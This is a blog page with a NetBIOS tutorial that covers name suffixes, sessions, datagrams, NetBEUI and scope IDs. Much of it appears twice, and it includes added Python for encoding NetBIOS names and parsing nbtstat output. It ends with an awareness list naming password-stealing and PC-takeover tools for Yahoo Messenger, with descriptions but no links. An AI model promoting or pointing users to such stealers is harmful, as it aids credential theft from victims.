<INet~Services>      1C         G     Internet Information Server
<IS~computername>    00         U     Internet Information Server
<computername>       [2B]       U     Lotus Notes Server
IRISMULTICAST        [2F]       G     Lotus Notes
IRISNAMESERVER       [33]       G     Lotus Notes
Forte_$ND800ZA       [20]       U     DCA Irmalan Gateway Service
Unique (U): The name may have only one IP address assigned to it. On a network device, multiple occurrences of a single name may appear to be registered, but the suffix will be unique, making the entire name unique.
Group (G): A normal group; the single name may exist with many IP addresses.
Multihomed (M): The name is unique, but due to multiple network interfaces on the same computer, this configuration is necessary to permit the registration. Maximum number of addresses is 25.
Internet Group (I): This is a special configuration of the group name used to manage WinNT domain names.
Domain Name (D): New in NT 4.0
For a quick and dirty look at a server's registered NetBIOS names and services, issue the following NBTSTAT command:
nbtstat -A [ipaddress]
nbtstat -a [host]
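Added example, not from the tutorial: Python that performs the RFC 1001 first-level encoding of a 15-character name plus suffix (the wire form behind the names discussed above), parses constructed nbtstat -A output, and maps each suffix to the service in the table above, so that a defender can see what a host advertises to the whole LAN. The suffix dictionary is a subset of the table; the nbtstat text and host names are constructed.

```python
import re

# Subset of the suffix table above, keyed by (suffix byte, "U" unique / "G" group).
# <INet~Services> also registers 1C/G; here 1C/G is read as Domain Controllers.
SUFFIX_USAGE = {
    (0x00, "U"): "Workstation Service",
    (0x00, "G"): "Domain Name",
    (0x01, "G"): "Master Browser",
    (0x03, "U"): "Messenger Service",
    (0x1B, "U"): "Domain Master Browser",
    (0x1C, "G"): "Domain Controllers",
    (0x1D, "U"): "Master Browser",
    (0x1E, "G"): "Browser Service Elections",
    (0x20, "U"): "File Server Service",
}


def describe_suffix(suffix: int, kind: str) -> str:
    """Map a suffix byte and name type to the service it advertises."""
    return SUFFIX_USAGE.get((suffix, kind), "unknown suffix %02X (%s)" % (suffix, kind))


def encode_name(name: str, suffix: int, scope: str = "") -> bytes:
    """RFC 1001 first-level encoding: the wire form of a NetBIOS name.

    The name is space padded to 15 bytes, byte 16 is the suffix, and every byte
    becomes two letters ('A' + high nibble, 'A' + low nibble). The 32-letter
    label is length prefixed, then come the scope ID labels and a zero terminator.
    """
    if len(name) > 15:
        raise ValueError("a NetBIOS name is at most 15 characters plus a suffix")
    raw = name.ljust(15).encode("ascii") + bytes([suffix])
    label = bytes(ord("A") + nib for b in raw for nib in (b >> 4, b & 0x0F))
    wire = bytes([len(label)]) + label
    for part in filter(None, scope.split(".")):
        wire += bytes([len(part)]) + part.encode("ascii")
    return wire + b"\x00"


def decode_name(wire: bytes) -> tuple[str, int, str]:
    """Reverse of encode_name: (name, suffix, scope) from the wire form."""
    if wire[0] != 32:
        raise ValueError("first label must be the 32-letter encoded name")
    label = wire[1:33]
    raw = bytes(((label[i] - ord("A")) << 4) | (label[i + 1] - ord("A"))
                for i in range(0, 32, 2))
    name, suffix = raw[:15].decode("ascii").rstrip(" "), raw[15]
    scope, pos = [], 33
    while wire[pos] != 0:                      # walk scope labels up to the terminator
        n = wire[pos]
        scope.append(wire[pos + 1:pos + 1 + n].decode("ascii"))
        pos += 1 + n
    return name, suffix, ".".join(scope)


# One registered-name row of "nbtstat -A", e.g. "DC01  <20>  UNIQUE  Registered".
NBTSTAT_ROW = re.compile(r"^\s*(\S.*?)\s*<([0-9A-Fa-f]{2})>\s+(UNIQUE|GROUP)\s+(\w+)", re.M)


def parse_nbtstat(output: str) -> list[tuple[str, int, str, str]]:
    """Turn nbtstat -A output into (name, suffix, U/G, usage) tuples."""
    rows = []
    for name, hexsuffix, kind, status in NBTSTAT_ROW.findall(output):
        if status == "Registered":
            suffix, k = int(hexsuffix, 16), kind[0]   # UNIQUE -> U, GROUP -> G
            rows.append((name, suffix, k, describe_suffix(suffix, k)))
    return rows


ROLE_BY_SUFFIX = {(0x20, "U"): "file server", (0x1C, "G"): "domain controller",
                  (0x1B, "U"): "domain master browser", (0x1D, "U"): "master browser"}


def advertised_roles(rows) -> set[str]:
    """What the host tells the LAN about itself, derived from its suffixes."""
    return {ROLE_BY_SUFFIX[(s, k)] for _n, s, k, _u in rows if (s, k) in ROLE_BY_SUFFIX}


# Constructed sample of "nbtstat -A <ip>" against a domain controller; not real output.
SAMPLE_NBTSTAT = """\
           NetBIOS Remote Machine Name Table

       Name               Type         Status
    ---------------------------------------------
    DC01           <00>  UNIQUE      Registered
    CORP           <00>  GROUP       Registered
    DC01           <20>  UNIQUE      Registered
    CORP           <1C>  GROUP       Registered
    CORP           <1B>  UNIQUE      Registered
    CORP           <1E>  GROUP       Registered
    ..__MSBROWSE__.<01>  GROUP       Registered

    MAC Address = 00-00-00-00-00-00
"""

if __name__ == "__main__":
    for row in parse_nbtstat(SAMPLE_NBTSTAT):
        print("%-16s <%02X> %s  %s" % row)
    print("advertised roles:", sorted(advertised_roles(parse_nbtstat(SAMPLE_NBTSTAT))))
```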
NetBIOS Sessions
The NetBIOS session service provides a connection-oriented, reliable, full-duplex message service to a user process. NetBIOS requires one process to be the client and the other to be the server. NetBIOS session establishment requires a preordained cooperation between the two stations. One application must have issued a Listen command when another application issues a Call command. The Listen command references a name in its NetBIOS name table (or WINS server), and also the remote name an application must use to qualify as a session partner. If the receiver (listener) is not already listening, the Call will be unsuccessful. If the call is successful, each application receives notification of session establishment with the session-id. The Send and Receive commands then transfer data. At the end of a session, either application can issue a Hang-Up command. There is no real flow control for the session service because it is assumed a LAN is fast enough to carry the required traffic.
NetBIOS Datagrams
Datagrams can be sent to a specific name, sent to all members of a group, or broadcast to the entire LAN. As with other datagram services, the NetBIOS datagrams are connectionless and unreliable. The Send_Datagram command requires the caller to specify the name of the destination. If the destination is a group name, then every member of the group receives the datagram. The caller of the Receive_Datagram command must specify the local name for which it wants to receive datagrams. The Receive_Datagram command also returns the name of the sender, in addition to the actual datagram data. If NetBIOS receives a datagram, but there are no Receive_Datagram commands pending, then the datagram is discarded.
The Send_Broadcast_Datagram command sends the message to every NetBIOS system on the local network. When a broadcast datagram is received by a NetBIOS node, every process that has issued a Receive_Broadcast_Datagram command receives the datagram. If none of these commands are outstanding when the broadcast datagram is received, the datagram is discarded.
NetBIOS enables an application to establish a session with another device and lets the network redirector and transaction protocols pass a request to and from another machine. NetBIOS does not actually manipulate the data. The NetBIOS specification defines an interface to the network protocol used to reach those services, not the protocol itself. Historically, NetBIOS has been paired with a network protocol called NetBEUI (NetBIOS Extended User Interface). The association of the interface and the protocol has sometimes caused confusion, but the two are different.
Network protocols always provide at least one method for locating and connecting to a particular service on a network. This is usually accomplished by converting a node or service name to a network address (name resolution). NetBIOS service names must be resolved to an IP address before connections can be established with TCP/IP. Most NetBIOS implementations for TCP/IP accomplish name to address resolution by using either broadcasts or LMHOSTS files. In a Microsoft environment, you would probably also use a NetBIOS Name Server known as WINS.
NetBEUI Explained
NetBEUI is an enhanced version of the NetBIOS protocol used by network operating systems. It formalizes the transport frame that was never standardized in NetBIOS and adds additional functions. It is the transport layer driver frequently used by Microsoft's LAN Manager. NetBEUI implements the OSI LLC2 protocol. NetBEUI is the original PC networking protocol and interface designed by IBM for the LAN Manager server. This protocol was later adopted by Microsoft for their networking products. It specifies the way that higher level software sends and receives messages over the NetBIOS frame protocol. This protocol runs over the standard 802.2 data-link protocol layer.
NetBIOS Scopes
A NetBIOS Scope ID provides an extended naming service for the NetBIOS over TCP/IP (known as NBT) module. The primary purpose of a NetBIOS scope ID is to isolate NetBIOS traffic on a single network to only those nodes with the same NetBIOS scope ID. The NetBIOS scope ID is a character string that is appended to the NetBIOS name. The NetBIOS scope ID on two hosts must match, or the two hosts will not be able to communicate. The NetBIOS Scope ID also allows computers to use the same computer name as long as they have different scope IDs. The Scope ID becomes a part of the NetBIOS name, making the name unique.
~cheers~
Preface to NetBIOS
Before you begin reading this section, understand that this section was written for the novice to the concept of NetBIOS, but - it also contains information the veteran might find educational. I am prefacing this so that I do not get e-mail like "Why did you start your NetBIOS section off so basic?" - Simple, its written for people that may be coming from an enviroment that does not use NetBIOS, so they would need me to start with basics, thanks.
Whats is NetBIOS?
NetBIOS (Network Basic Input/Output System) was originally developed by IBM and Sytek as an Application Programming Interface (API) for client software to access LAN resources. Since its creation, NetBIOS has become the basis for many other networking applications. In its strictest sense, NetBIOS is an interface specification for accessing networking services.
NetBIOS, a layer of software developed to link a network operating system with specific hardware, was originally designed as THE network controller for IBM's Network LAN. NetBIOS has now been extended to allow programs written using the NetBIOS interface to operate on the IBM token ring architecture. NetBIOS has since been adopted as an industry standard and now, it is common to refer to NetBIOS-compatible LANs.
It offers network applications a set of "hooks" to carry out inter-application communication and data transfer. In a basic sense, NetBIOS allows applications to talk to the network. Its intention is to isolate application programs from any type of hardware dependancies. It also spares software developers the task of developing network error recovery and low level message addressing or routing. The use of the NetBIOS interface does alot of this work for them.
NetBIOS standardizes the interface between applications and a LANs operating capabilities. With this, it can be specified to which levels of the OSI model the application can write to, making the application transportable to other networks. In a NetBIOS LAN environment, computers are known on the system by a name. Each computer on the network has a permanent name that is programmed in various different ways. These names will be discussed in more detail below.
PC's on a NetBIOS LAN communicate either by establishing a session or by using NetBIOS datagram or broadcast methods. Sessions allow for a larger message to be sent and handle error detection and correction. The communication is on a one-to-one basis. Datagram and broadcast methods allow one computer to communicate with several other computers at the same time, but are limited in message size. There is no error detection or correction using these datagram or broadcast methods. However, datagram communication allows for communication without having to establish a session.
All communication in these environments are presented to NetBIOS in a format called Network Control Blocks (NCB). The allocation of these blocks in memory is dependant on the user program. These NCB's are divided into fields, these are reserved for input and output respectively.
NetBIOS is a very common protocol used in todays environments. NetBIOS is supported on Ethernet, TokenRing, and IBM PC Networks. In its original induction, it was defined as only an interface between the application and the network adapter. Since then, transport like functions have been added to NetBIOS, making it more functional over time.
In NetBIOS, connection (TCP) oriented and connectionless (UDP) communication are both supported. It supports both broadcasts and multicasting and supports three distinct services: Naming, Session, and Datagram.
NetBIOS Names
NetBIOS names are used to identify resources on a network. Applications use these names to start and end sessions. You can configure a single machine with multiple applications, each of which has a unique NetBIOS name. Each PC that supports an application also has a NetBIOS station name that is user defined or that NetBIOS derives by internal means.
NetBIOS can consist of up to 16 alphanumeric characters. The combination of characters must be unique within the entire source routing network. Before a PC that uses NetBIOS can fully function on a network, that PC must register their NetBIOS name.
When a client becomes active, the client advertises their name. A client is considered to be registered when it can successfully advertise itself without any other client claiming it has the same name. The steps of the registration process is as follows:
1. Upon boot up, the client broadcasts itself and its NetBIOS information anywhere from 6 to 10 to ensure every other client on the network receives the information.
2. If another client on the network already has the name, that NetBIOS client issues its own broadcast to indicate that the name is in use. The client who is trying to register the already in use name, stop all attempts to register that name.
3. If no other client on the network objects to the name registration, the client will finish the registration process.
There are two types of names in a NetBIOS enviroment: Unique and Group. A unique name must be unique across the network. A group name does not have to be unique and all processes that have a given group name belong to the group. Each NetBIOS node maintains a table of all names currently owned by that node.
The NetBIOS naming convention allows for 16 characters in a NetBIOS name. Microsoft, however, limits these names to 15 characters and uses the 16th character as a NetBIOS suffix. A NetBIOS suffix is used by Microsoft Networking software to indentify the functionality installed or the registered device or service.
[QuickNote: SMB and NBT (NetBIOS over TCP/IP work very closely together and both use ports 137, 138, 139. Port 137 is NetBIOS name UDP. Port 138 is NetBIOS datagram UDP. Port 139 is NetBIOS session TCP. For further information on NetBIOS, read the paper at the rhino9 website listed above]
The following is a table of NetBIOS suffixes currently used by Microsoft WindowsNT. These suffixes are displayed in hexadecimal format.
Name Number Type Usage
==========================================================================
<\\_MSBROWSE_> 01 G Master Browser
IRISMULTICAST [2F] G Lotus Notes
IRISNAMESERVER [33] G Lotus Notes
Forte_$ND800ZA [20] U DCA Irmalan Gateway Service
Unique (U): The name may have only one IP address assigned to it. On a network device, multiple occurrences of a single name may appear to be registered, but the suffix will be unique, making the entire name unique.
Group (G): A normal group; the single name may exist with many IP addresses.
Multihomed (M): The name is unique, but due to multiple network interfaces on the same computer, this configuration is necessary to permit the registration. Maximum number of addresses is 25.
Internet Group (I): This is a special configuration of the group name used to manage WinNT domain names.
Domain Name (D): New in NT 4.0
For a quick and dirty look at a servers registered NetBIOS names and services, issue the following NBTSTAT command:
nbtstat -A [ipaddress]
nbtstat -a [host]
NetBIOS Sessions
The NetBIOS session service provides a connection-oriented, reliable, full-duplex message service to a user process. NetBIOS requires one process to be the client and the other to be the server. NetBIOS session establishment requires a preordained cooperation between the two stations. One application must have issued a Listen command when another application issues a Call command. The Listen command references a name in its NetBIOS name table (or WINS server), and also the remote name an application must use to qualify as a session partner. If the receiver (listener) is not already listening, the Call will be unsuccessful. If the call is successful, each application receives notification of session establishment with the session-id. The Send and Receive commands the transfer data. At the end of a session, either application can issue a Hang-Up command. There is no real flow control for the session service because it is assumed a LAN is fast enough to carry the required traffic.
NetBIOS Datagrams
Datagrams can be sent to a specific name, sent to all members of a group, or broadcast to the entire LAN. As with other datagram services, the NetBIOS datagrams are connectionless and unreliable. The Send_Datagram command requires the caller to specify the name of the destination. If the destination is a group name, then every member of the group receives the datagram. The caller of the Receive_Datagram command must specify the local name for which it wants to receive datagrams. The Receive_Datagram command also returns the name of the sender, in addition to the actual datagram data. If NetBIOS receives a datagram, but there are no Receive_Datagram commands pending, then the datagram is discarded.
The Send_Broadcast_Datagram command sends the message to every NetBIOS system on the local network. When a broadcast datagram is received by a NetBIOS node, every process that has issued a Receive_Broadcast_Datagram command receives the datagram. If none of these commands are outstanding when the broadcast datagram is received, the datagram is discarded.
NetBIOS enables an application to establish a session with another device and lets the network redirector and transaction protocols pass a request to and from another machine. NetBIOS does not actually manipulate the data. The NetBIOS specification defines an interface to the network protocol used to reach those services, not the protocol itself. Historically, NetBIOS has been paired with a network protocol called NetBEUI (NetBIOS Extended User Interface). The association of the interface and the protocol has sometimes caused confusion, but the two are different.
Network protocols always provide at least one method for locating and connecting to a particular service on a network. This is usually accomplished by converting a node or service name to a network address (name resolution). NetBIOS service names must be resolved to an IP address before connections can be established over TCP/IP. Most NetBIOS implementations for TCP/IP accomplish name-to-address resolution by using either broadcasts or LMHOSTS files. In a Microsoft environment, you would probably also use a NetBIOS Name Server, known as WINS.
NetBEUI Explained
NetBEUI is an enhanced version of the NetBIOS protocol used by network operating systems. It formalizes the transport frame that was never standardized in NetBIOS and adds additional functions. It is the transport layer driver frequently used by Microsoft's LAN Manager. NetBEUI implements the OSI LLC2 protocol. NetBEUI is the original PC networking protocol and interface designed by IBM for the LAN Manager server. This protocol was later adopted by Microsoft for their networking products. It specifies the way that higher level software sends and receives messages over the NetBIOS frame protocol. This protocol runs over the standard 802.2 data-link protocol layer.
NetBIOS Scopes
A NetBIOS Scope ID provides an extended naming service for the NetBIOS over TCP/IP (known as NBT) module. The primary purpose of a NetBIOS scope ID is to isolate NetBIOS traffic on a single network to only those nodes with the same NetBIOS scope ID. The NetBIOS scope ID is a character string that is appended to the NetBIOS name. The NetBIOS scope ID on two hosts must match, or the two hosts will not be able to communicate. The NetBIOS Scope ID also allows computers to use the same computer name as long as they have different scope IDs, because the Scope ID becomes part of the NetBIOS name, making the full name unique.
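As an added example (not code from the original post), the following shows how the pieces described above fit together on the wire: the 15-byte name, the 16th-byte suffix from the name table, and the scope ID are combined using the RFC 1001/1002 first- and second-level encodings, and decoded again so that a name seen in a name-service packet can be logged in readable form. The suffix table and names used are standard or constructed values, not taken from the page.

```python
# Added example (not from the original post): how a NetBIOS name, its 16th-byte
# suffix and an optional scope ID are encoded for the wire (RFC 1001/1002), and decoded.

# A few well-known suffixes (standard values; the page's table lists others).
SUFFIXES = {
    0x00: "Workstation Service", 0x03: "Messenger Service",
    0x1B: "Domain Master Browser", 0x1C: "Domain Controllers",
    0x1D: "Master Browser", 0x1E: "Browser Service Elections",
    0x20: "File Server Service",
}
ALPHABET = "ABCDEFGHIJKLMNOP"  # one letter per nibble value 0..15

def first_level_encode(name: str, suffix: int, pad: bytes = b" ") -> str:
    """Pad name to 15 bytes, append the suffix byte, map each nibble to A..P."""
    raw = name.upper().encode("latin-1")
    if len(raw) > 15:
        raise ValueError("NetBIOS names are at most 15 bytes")
    raw = raw.ljust(15, pad) + bytes([suffix & 0xFF])
    return "".join(ALPHABET[b >> 4] + ALPHABET[b & 0x0F] for b in raw)

def first_level_decode(encoded: str) -> tuple[str, int]:
    """Reverse of first_level_encode: (name with padding stripped, suffix)."""
    if len(encoded) != 32 or any(c not in ALPHABET for c in encoded):
        raise ValueError("malformed first-level encoded name")
    raw = bytes((ALPHABET.index(encoded[i]) << 4) | ALPHABET.index(encoded[i + 1])
                for i in range(0, 32, 2))
    return raw[:15].rstrip(b" \x00").decode("latin-1"), raw[15]

def second_level_encode(encoded: str, scope: str = "") -> bytes:
    """DNS-style labels: the 32-char name, each scope ID label, zero terminator.
    Different scope IDs give different wire names, so mismatched scopes never match."""
    labels = [encoded.encode("ascii")] + [s.encode("ascii") for s in scope.split(".") if s]
    return b"".join(bytes([len(s)]) + s for s in labels) + b"\x00"

def second_level_decode(data: bytes) -> tuple[str, str]:
    """Return (32-char encoded name, dotted scope ID) from the label sequence."""
    labels, i = [], 0
    while data[i]:  # a zero length byte ends the name
        n = data[i]
        labels.append(data[i + 1:i + 1 + n].decode("ascii"))
        i += 1 + n
    return labels[0], ".".join(labels[1:])

def describe(data: bytes) -> str:
    """Readable form of a wire name, e.g. for logging what a name-service query asked for."""
    encoded, scope = second_level_decode(data)
    name, suffix = first_level_decode(encoded)
    return f"{name!r}<{suffix:02X}> ({SUFFIXES.get(suffix, 'unknown')}) scope={scope or '<none>'}"
```

The wildcard name "*" (padded with NULs rather than spaces) is the name a node-status request such as nbtstat -A carries, and the MSBROWSE group name from the table above encodes to the familiar 32-letter string seen in browser traffic.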
Some tool names
Hacker tools, a reference. BEWARE!!
Aah!!
The following tools I am going to list are some of the dangerous tools available on the web, which may be used against you by an unethical hacker. I want you to be well aware of all the possibilities.
They are free to download and it takes seconds to crush a personal computer if it is connected online. I am not disclosing the links to these tools.
Lord PS
Lord PS is an editor that will create a password stealer/virus that emails the captured passwords back to whoever built it, with tons of options; options may include taking over your entire PC and disallowing you access to any of the files.
Hosein PS v1.6
Does the same job as the above with fewer options/features; another Yahoo password stealer.
Fucker PS
This is a strong multi-password stealer that will grab passwords from all the most commonly used programs/services (MSN, Yahoo, etc.).
JPS v1.8
Another password grabber/stealer and e-mailer that is more focused on Yahoo Messenger.
Demon PS v2.3
Yahoo Messenger password stealer/mailer with anti-virus kill options and other system features.
Tro messenger
The big boss; used with Yahoo Messenger, it lets the attacker take over the victim's PC.
Many more exist; I will be disclosing all of them.
You can contribute too.
ABOUT ME
- SAINATH GUPTA
- Entrepreneur, Student at IIIT, Geek & Blogger. I am a person who loves to make loads of friends; well, that's my favorite hobby! I always look forward to making new friends while equally valuing the old ones, so do feel free to say hi :)